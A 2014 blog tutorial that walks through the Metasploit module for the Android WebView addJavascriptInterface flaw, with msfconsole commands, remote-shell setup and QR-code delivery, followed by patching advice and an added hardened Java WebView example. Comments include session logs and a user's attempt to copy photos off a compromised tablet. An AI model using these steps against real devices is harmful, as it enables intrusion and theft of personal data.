Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit/android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

[Screenshot: Use Exploit]

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

[Screenshot: Set UriPath Exploit]

5. Finally, type “exploit”:

[Screenshot: Exploit]

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

[Screenshot: Session created]

Now just connect to the session using “sessions -i 1”:

[Screenshot: Interacting with session]

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

[Screenshot: LS not found]

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo $PATH” revealed that no path was set:

[Screenshot: Echo Path]

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

[Screenshot: export path]

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built-in Browser, and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, the device automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android below 4.2, which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update); check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version, and it was not vulnerable. Then I remembered that the Android Browser did have an update that I downloaded before testing.

I am not sure whether this will be true for all devices; again, the best course of action is to update to the latest OS version.
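Updating the OS is the fix for users; for app developers the same bug class comes down to how a WebView's JavaScript bridge is attached. The following is an added example (not code from the original post or from the Metasploit module) showing the vulnerable pattern beside a hardened one; the class, bridge and host names are made up for illustration.

```java
// Added example: keeping an app's WebView out of the addJavascriptInterface
// bug class. SafeWebViewSetup, Bridge and trustedHost are hypothetical names.
import android.net.Uri;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class SafeWebViewSetup {
    // On API 17+ (Android 4.2+) only methods carrying @JavascriptInterface are
    // reachable from page JavaScript. Below that, every public method of the
    // object (and anything reachable through them) is exposed to whatever page
    // the WebView happens to load, which is what the post's exploit relies on.
    static class Bridge {
        @JavascriptInterface
        public String appVersion() { return "1.0"; }
    }

    // Vulnerable pattern: bridge attached unconditionally and the WebView may
    // navigate to any origin, so an untrusted page reaches the bridge too.
    static void vulnerable(WebView wv) {
        wv.getSettings().setJavaScriptEnabled(true);
        wv.addJavascriptInterface(new Bridge(), "Android");
        wv.loadUrl("http://example.invalid/"); // any page, any origin
    }

    // Hardened pattern: no bridge on pre-4.2 devices, navigation pinned to one
    // trusted host, and the platform's own legacy bridge removed.
    static void hardened(WebView wv, final String trustedHost) {
        wv.getSettings().setJavaScriptEnabled(true);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            wv.addJavascriptInterface(new Bridge(), "Android");
        } else {
            // Annotation not enforced here: degrade the feature, not the device.
            // Older platforms also inject this system bridge; remove it too.
            wv.removeJavascriptInterface("searchBoxJavaBridge_");
        }
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                String host = Uri.parse(url).getHost();
                // true = block the navigation; only the trusted host is loaded.
                return !trustedHost.equals(host);
            }
        });
        wv.loadUrl("https://" + trustedHost + "/");
    }
}
```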

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.

~ by D. Dieterle on February 26, 2014.

18 Responses to “Android Webview Exploit Tutorial (70% of Devices Vulnerable!)”

  1. Hi … what was your browser name?

  2. I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas?

    • Are you running Kali in a Virtual Machine? I have seen the anti-virus/firewall running on a Virtual Machine catch and block several of the exploits.

      • I am! This was running in an Oracle VirtualBox VM. Thanks for the feedback; I’ll try this from a native install tonight.

      • Hello again! I’m trying to get this working for a project for graduate school, and I’m still hitting difficulties. I’ll let you know what I’ve done in case I’ve missed a dependency somewhere.

        1) Loaded Kali Linux from a Live CD (Not a VM this time).
        2) Copied the Ruby code from Rapid7’s website into /root/.msf4/modules/exploits/android/browser/webview_addjavascriptinterface.rb
        3) Loaded Applications–> Kali Linux–> System Services–> Metasploit–> community / pro start
        4) In a terminal, loaded msfconsole
        5) followed your guide to “use exploit/android/browser/webview_addjavascriptinterface” and set URIPATH
        6) Navigated to this site from a vulnerable phone.

        The phone redirects to /Security/(random string) and Metasploit shows “Gathering target information” and “Serving exploit HTML”, but still, no connection/session is ever made. Any guidance would be appreciated. I appreciate the help! My next step may be to load an older ROM on the device in case Moto/Verizon silently released a patch somehow.

        The phone is a Verizon Droid RAZR MAXX OS 4.1.2.
        I’ve also tried using a TMobile HTC MyTouch (OS: 2.3.4) but this may be too out of date.

      • It is in the newer versions of Metasploit so you really don’t need to download the code from Rapid7. Just type “msfupdate” and it should pull down the latest exploits and updates for Metasploit. Maybe it needs something else in the updates to function? But your target system might have been patched for the exploit. I have a Kyocera phone that should be vulnerable by OS Version, but the Browser was patched so it isn’t.

  3. Can you confirm if this would also work from a Windows installation of Metasploit?

    I followed your guide, but used it from a Windows install. I get to the part where my Android unit creates a session with the console; I connect to that console number to interact, however, nothing happens after that.

    I enter commands and get no return to the console. Are there any ideas that you can pass my way?
    This is the last thing the console shows…

    GET /lolcat HTTP/1.1
    Host: 192.168.1.137:4444
    Connection: keep-alive
    Referer: http://goo.gl/
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; KENWOOD DNN 2013 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
    Accept-Encoding: gzip,deflate
    Accept-Language: en-US
    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    • As an update to this, I can answer my own question. The answer is yes – the exploit works in Windows and Linux.

      However, all of the devices and ADV builds (4.0, 4.03, 4.2 etc) all do the same thing – the final log in Metasploit is “Serving exploit HTML” followed by nothing.

      Can anyone confirm if they were able to get this exploit to work in ADV with any android 4.x images?

  4. Hello

    I have the same problem. If I work with the SDK emulator everything is all right. I tested it with a real smartphone and had the same problems as Chris.

    • I actually couldn’t get it working with a couple emulators, but got it working on about 50% of the Android devices I have tested so far – Phones and tablets. It is odd though, some devices that should be vulnerable by Android version number didn’t seem to be.

  5. Hi
    I have access to the tablet! I can read the devices and can run some shell commands. But when I want to steal a picture with
    dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M

    i get the response /dev/sdc: cannot open for write: Permission denied

  6. In Kali Linux I use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
    msf exploit(webview_addjavascriptinterface) > [*] 192.168.178.23 webview_addjavascriptinterface - Gathering target information.
    [*] 192.168.178.23 webview_addjavascriptinterface - Sending response HTML.
    [*] 192.168.178.23 webview_addjavascriptinterface - Serving exploit HTML
    [*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000
    msf exploit(webview_addjavascriptinterface) > sessions -i 1
    [*] Starting interaction with 1...
    export PATH=/system/bin:$PATH
    ls -al
    drwxr-xr-x root root 2014-05-15 16:56 acct
    -rw-r--r-- root root 332 2014-05-15 16:56 boot.txt
    drwxrwx--x system cache 2014-05-10 09:22 cache
    dr-x------ root root 2014-05-15 16:56 config
    lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
    drwxrwx--x system system 2014-05-12 09:41 data
    -rw-r--r-- root root 129 2014-05-15 16:56 default.prop
    drwxr-xr-x root root 2014-05-15 17:12 dev
    drwxr-xr-x radio radio 2014-05-09 13:55 efs
    lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
    lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
    -rwxr-x--- root root 105292 2014-05-15 16:56 init
    -rwxr-x--- root root 1107 2014-05-15 16:56 init.cm.rc
    -rwxr-x--- root root 2344 2014-05-15 16:56 init.goldfish.rc
    -rwxr-x--- root root 5171 2014-05-15 16:56 init.p1-common.rc
    -rwxr-x--- root root 5389 2014-05-15 16:56 init.p1.rc
    -rwxr-x--- root root 936 2014-05-15 16:56 init.p1.usb.rc
    -rwxr-x--- root root 17862 2014-05-15 16:56 init.rc
    -rwxr-x--- root root 1637 2014-05-15 16:56 init.trace.rc
    -rwxr-x--- root root 3915 2014-05-15 16:56 init.usb.rc
    -rw-r--r-- root root 1664 2014-05-15 16:56 lpm.rc
    drwxrwxr-x root system 2014-05-15 16:56 mnt
    dr-xr-xr-x root root 1970-01-01 00:00 proc
    drwxr-xr-x root root 2014-05-09 13:55 radio
    drwxr-x--- root root 2014-05-15 16:56 sbin
    lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
    d---r-x--- system sdcard_r 2014-05-15 16:56 storage
    drwxr-xr-x root root 2014-05-15 16:56 sys
    drwxr-xr-x root root 2014-05-09 13:56 system
    -rw-r--r-- root root 272 2014-05-15 16:56 ueventd.goldfish.rc
    -rw-r--r-- root root 2035 2014-05-15 16:56 ueventd.p1.rc
    -rw-r--r-- root root 5075 2014-05-15 16:56 ueventd.rc
    lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor
    I want to copy some pictures to my KALI system but here is the problem:
    dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
    /dev/sdc: cannot open for write: Permission denied
    Or I want to run adb (no device!)
    adb devices
    * daemon not running. starting it now on port 5038 *
    * daemon started successfully *
    List of devices attached

    • Is the phone rooted? If the phone is not rooted, there are several areas that you will not be able to access. For those who root their phone, it is pretty much one of the last lines of defense that you are removing.

  7. The phone is rooted ….. do you have another idea? I also can’t download any files from the phone to my Desktop, but I can delete folders etc. on the phone.

  8. I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas? The OS doesn’t run in the VM.
